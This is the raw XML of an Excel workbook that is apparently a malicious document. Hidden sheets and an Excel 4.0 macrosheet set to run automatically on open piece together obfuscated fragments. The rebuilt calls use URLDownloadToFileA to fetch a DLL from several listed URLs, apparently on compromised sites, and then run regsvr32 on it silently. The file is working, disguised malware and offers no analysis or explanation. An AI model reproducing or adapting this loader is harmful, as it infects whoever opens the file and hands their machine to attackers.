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macrosheets/intlsheet1.xml" ContentType="application/vnd.ms-excel.intlmacro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osik\Desktop\File3\15m\CIR-ZV\ZV\1\V\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{967FFC5F-BA1B-49F1-B618-1AA6797C4C57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Eggedv" sheetId="2" state="hidden" r:id="rId1"/>
    <sheet name="Sheet" sheetId="3" r:id="rId2"/>
    <sheet name="Lefs" sheetId="4" state="hidden" r:id="rId3"/>
    <sheet name="LFEVE" sheetId="5" state="hidden" r:id="rId4"/>
    <sheet name="O1" sheetId="6" state="hidden" r:id="rId5"/>
    <sheet name="O2" sheetId="7" state="hidden" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="DPFW1">LFEVE!$F$11</definedName>
    <definedName name="DPFW2">LFEVE!$F$13</definedName>
    <definedName name="DPFW3">LFEVE!$F$15</definedName>
    <definedName name="DPFW4">LFEVE!$F$17</definedName>
    <definedName name="DPFW5">LFEVE!$F$19</definedName>
    <definedName name="DPFW6">LFEVE!$F$21</definedName>
    <definedName name="DPFW7">LFEVE!$F$23</definedName>
    <definedName name="_xlnm.Auto_Open">LFEVE!$F$1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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="20" uniqueCount="20">
  <si>
    <t>-</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;0, </t>
  </si>
  <si>
    <t>SysWow64\</t>
  </si>
  <si>
    <t xml:space="preserve"> ..\rfs.dll</t>
  </si>
  <si>
    <t>\Windows\</t>
  </si>
  <si>
    <t>",0,0)</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>,0,</t>
  </si>
  <si>
    <t>"..\rfs.dll</t>
  </si>
  <si>
    <t>regsvr32.exe</t>
  </si>
  <si>
    <t>"http://henrysfreshroast.com/6cc4ts0bkrOlXq/",</t>
  </si>
  <si>
    <t>"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/",</t>
  </si>
  <si>
    <t>"http://blog.centerking.top/wp-includes/DBq5jx/",</t>
  </si>
  <si>
    <t>"http://polarrefrigeracao.com.br/fontes/y7QpO/",</t>
  </si>
  <si>
    <t>"http://filmsetserie.dx.am/img/ghCY9J5KD1J/",</t>
  </si>
  <si>
    <t>"https://vagbharati.in/wp-admin/nYBb/",</t>
  </si>
  <si>
    <t>"http://advogadogoiania.com.br/wp-includes/O9Az4/",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</si>
</sst>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BF6B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33" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFon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colors>
    <mruColors>
      <color rgb="FFFBF6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microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet1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30064</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>276224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581A9C89-A5EB-43E5-A25A-805470B0A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64464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9128991-9E66-4361-927B-AE414DD7E4DF}">
  <dimension ref="F7"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="F8" sqref="F8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="7.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="5" max="5" width="7.5703125" customWidth="1"/>
    <col min="6" max="6" width="19.140625" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="7" spans="6:6" x14ac:dyDescent="0.25">
      <c r="F7" t="b">
        <f>FORMULA(Eggedv!P22&amp;Eggedv!H9&amp;Eggedv!L2&amp;Eggedv!B15&amp;Eggedv!B15&amp;Sheet!C8&amp;Sheet!I5&amp;Eggedv!F10&amp;Sheet!M11&amp;'O2'!B2&amp;Eggedv!L2&amp;Sheet!O8&amp;Lefs!J19&amp;Sheet!E14&amp;Lefs!S17&amp;Lefs!F18,F11)=FORMULA(Eggedv!P22&amp;Eggedv!J11&amp;Eggedv!B18&amp;Eggedv!P11&amp;"DPFW1"&amp;Lefs!Q7&amp;Eggedv!H9&amp;Eggedv!L2&amp;Eggedv!B15&amp;Eggedv!B15&amp;Sheet!C8&amp;Sheet!I5&amp;Eggedv!F10&amp;Sheet!M11&amp;'O2'!B2&amp;Eggedv!L2&amp;Sheet!O8&amp;Lefs!J19&amp;Sheet!F16&amp;Lefs!S17&amp;Lefs!F18&amp;Eggedv!P13,F13)=FORMULA(Eggedv!P22&amp;Eggedv!J11&amp;Eggedv!B18&amp;Eggedv!P11&amp;"DPFW2"&amp;Lefs!Q7&amp;Eggedv!H9&amp;Eggedv!L2&amp;Eggedv!B15&amp;Eggedv!B15&amp;Sheet!C8&amp;Sheet!I5&amp;Eggedv!F10&amp;Sheet!M11&amp;'O2'!B2&amp;Eggedv!L2&amp;Sheet!O8&amp;Lefs!J19&amp;Sheet!G14&amp;Lefs!S17&amp;Lefs!F18&amp;Eggedv!P13,F15)=FORMULA(Eggedv!P22&amp;Eggedv!J11&amp;Eggedv!B18&amp;Eggedv!P11&amp;"DPFW3"&amp;Lefs!Q7&amp;Eggedv!H9&amp;Eggedv!L2&amp;Eggedv!B15&amp;Eggedv!B15&amp;Sheet!C8&amp;Sheet!I5&amp;Eggedv!F10&amp;Sheet!M11&amp;'O2'!B2&amp;Eggedv!L2&amp;Sheet!O8&amp;Lefs!J19&amp;Sheet!H16&amp;Lefs!S17&amp;Lefs!F18&amp;Eggedv!P13,F17)=FORMULA(Eggedv!P22&amp;Eggedv!J11&amp;Eggedv!B18&amp;Eggedv!P11&amp;"DPFW4"&amp;Lefs!Q7&amp;Eggedv!H9&amp;Eggedv!L2&amp;Eggedv!B15&amp;Eggedv!B15&amp;Sheet!C8&amp;Sheet!I5&amp;Eggedv!F10&amp;Sheet!M11&amp;'O2'!B2&amp;Eggedv!L2&amp;Sheet!O8&amp;Lefs!J19&amp;Sheet!I14&amp;Lefs!S17&amp;Lefs!F18&amp;Eggedv!P13,F19)=FORMULA(Eggedv!P22&amp;Eggedv!J11&amp;Eggedv!B18&amp;Eggedv!P11&amp;"DPFW5"&amp;Lefs!Q7&amp;Eggedv!H9&amp;Eggedv!L2&amp;Eggedv!B15&amp;Eggedv!B15&amp;Sheet!C8&amp;Sheet!I5&amp;Eggedv!F10&amp;Sheet!M11&amp;'O2'!B2&amp;Eggedv!L2&amp;Sheet!O8&amp;Lefs!J19&amp;Sheet!J16&amp;Lefs!S17&amp;Lefs!F18&amp;Eggedv!P13,F21)=FORMULA(Eggedv!P22&amp;Eggedv!J11&amp;Eggedv!B18&amp;Eggedv!P11&amp;"DPFW6"&amp;Lefs!Q7&amp;Eggedv!H9&amp;Eggedv!L2&amp;Eggedv!B15&amp;Eggedv!B15&amp;Sheet!C8&amp;Sheet!I5&amp;Eggedv!F10&amp;Sheet!M11&amp;'O2'!B2&amp;Eggedv!L2&amp;Sheet!O8&amp;Lefs!J19&amp;Sheet!K14&amp;Lefs!S17&amp;Lefs!F18&amp;Eggedv!P13,F23)=FORMULA(Eggedv!P22&amp;Eggedv!J11&amp;Eggedv!B18&amp;Eggedv!P11&amp;"DPFW7"&amp;Lefs!Q7&amp;Eggedv!H9&amp;Eggedv!B15&amp;Eggedv!I17&amp;Eggedv!I3&amp;Eggedv!H13&amp;Eggedv!P11&amp;Eggedv!K9&amp;Eggedv!P13&amp;Eggedv!P7&amp;Eggedv!P13,F25)=FORMULA(Eggedv!P22&amp;Eggedv!H13&amp;Eggedv!N4&amp;Eggedv!H13&amp;Eggedv!H9&amp;Eggedv!P11&amp;Eggedv!P15&amp;Eggedv!H9&amp;Eggedv!P20&amp;Lefs!M14&amp;Lefs!N10&amp;Lefs!I6&amp;Sheet!R17&amp;Lefs!G12&amp;Eggedv!P15&amp;Eggedv!P13,F27)=FORMULA(Eggedv!P22&amp;Eggedv!G24&amp;Eggedv!H13&amp;Eggedv!E6&amp;Eggedv!E11&amp;Eggedv!G24&amp;Eggedv!K23&amp;Eggedv!P11&amp;Eggedv!P13,F33)</f>
        <v>1</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet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D28BE-B617-477B-A293-1DAADB787060}">
  <dimension ref="A2:Q37"/>
  <sheetViews>
    <sheetView topLeftCell="A13" workbookViewId="0">
      <selection activeCell="G6" sqref="G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997D5-0CD5-469C-9A3F-DDB3B28D8A59}">
  <dimension ref="C1:R17"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="AM56" sqref="AM56"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="3:15" s="1" customFormat="1" ht="21.75" customHeight="1" x14ac:dyDescent="0.25"/>
    <row r="5" spans="3:15" x14ac:dyDescent="0.25">
      <c r="I5" s="2" t="str">
        <f>T(Eggedv!A12&amp;Eggedv!E2&amp;Eggedv!D7&amp;Eggedv!P15&amp;Eggedv!P7&amp;Eggedv!P15&amp;Eggedv!E11&amp;Eggedv!F4&amp;Eggedv!B15&amp;Eggedv!D13&amp;Eggedv!E2)</f>
        <v>mon","URLDo</v>
      </c>
    </row>
    <row r="8" spans="3:15" x14ac:dyDescent="0.25">
      <c r="C8" s="2" t="str">
        <f>T(Eggedv!P11&amp;Eggedv!P15&amp;Eggedv!B5&amp;Eggedv!C3&amp;Eggedv!C9)</f>
        <v>("url</v>
      </c>
      <c r="O8" s="2" t="str">
        <f>T(Eggedv!P15&amp;Eggedv!P7&amp;Eggedv!P15&amp;Eggedv!J6&amp;Eggedv!J6&amp;Eggedv!H9&amp;Eggedv!H9&amp;Eggedv!K14&amp;Eggedv!K14&amp;Eggedv!P15)</f>
        <v>","JJCCBB"</v>
      </c>
    </row>
    <row r="11" spans="3:15" x14ac:dyDescent="0.25">
      <c r="M11" s="2" t="str">
        <f>T(Eggedv!D7&amp;Eggedv!C9&amp;Eggedv!E2&amp;Eggedv!D17&amp;Eggedv!F15&amp;Eggedv!E6&amp;Eggedv!E2&amp;Eggedv!B18&amp;Eggedv!G2&amp;Eggedv!C9)</f>
        <v>nloadToFil</v>
      </c>
    </row>
    <row r="14" spans="3:15" x14ac:dyDescent="0.25">
      <c r="E14" s="2" t="s">
        <v>13</v>
      </c>
      <c r="G14" s="2" t="s">
        <v>15</v>
      </c>
      <c r="I14" s="2" t="s">
        <v>17</v>
      </c>
      <c r="K14" s="2" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="16" spans="3:15" x14ac:dyDescent="0.25">
      <c r="F16" s="2" t="s">
        <v>14</v>
      </c>
      <c r="H16" s="2" t="s">
        <v>16</v>
      </c>
      <c r="J16" s="2" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="17" spans="18:18" x14ac:dyDescent="0.25">
      <c r="R17" s="2" t="str">
        <f>T(Eggedv!P19&amp;Eggedv!P2&amp;Eggedv!M7)</f>
        <v xml:space="preserve"> -s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12BE8-4A9D-4C0D-ABAA-83C6A0FE176D}">
  <dimension ref="F6:S19"/>
  <sheetViews>
    <sheetView topLeftCell="C1" workbookViewId="0">
      <selection activeCell="I7" sqref="I7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="6" spans="7:17" x14ac:dyDescent="0.25">
      <c r="I6" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="7" spans="7:17" x14ac:dyDescent="0.25">
      <c r="Q7" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="10" spans="7:17" x14ac:dyDescent="0.25">
      <c r="N10" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="12" spans="7:17" x14ac:dyDescent="0.25">
      <c r="G12" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="14" spans="7:17" x14ac:dyDescent="0.25">
      <c r="M14" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="17" spans="6:19" x14ac:dyDescent="0.25">
      <c r="S17" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="18" spans="6:19" x14ac:dyDescent="0.25">
      <c r="F18" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="19" spans="6:19" x14ac:dyDescent="0.25">
      <c r="J19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"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C6" sqref="C6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="2" spans="2:2" x14ac:dyDescent="0.25">
      <c r="B2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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="6" baseType="lpstr">
      <vt:lpstr>Eggedv</vt:lpstr>
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Lefs</vt:lpstr>
      <vt:lpstr>O1</vt:lpstr>
      <vt:lpstr>O2</vt:lpstr>
      <vt:lpstr>LFEVE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</dc:creator>
  <cp:lastModifiedBy>Ofsfgse</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-15T19:02:32Z</dcterms:modified>
</cp:coreProperties>
</file>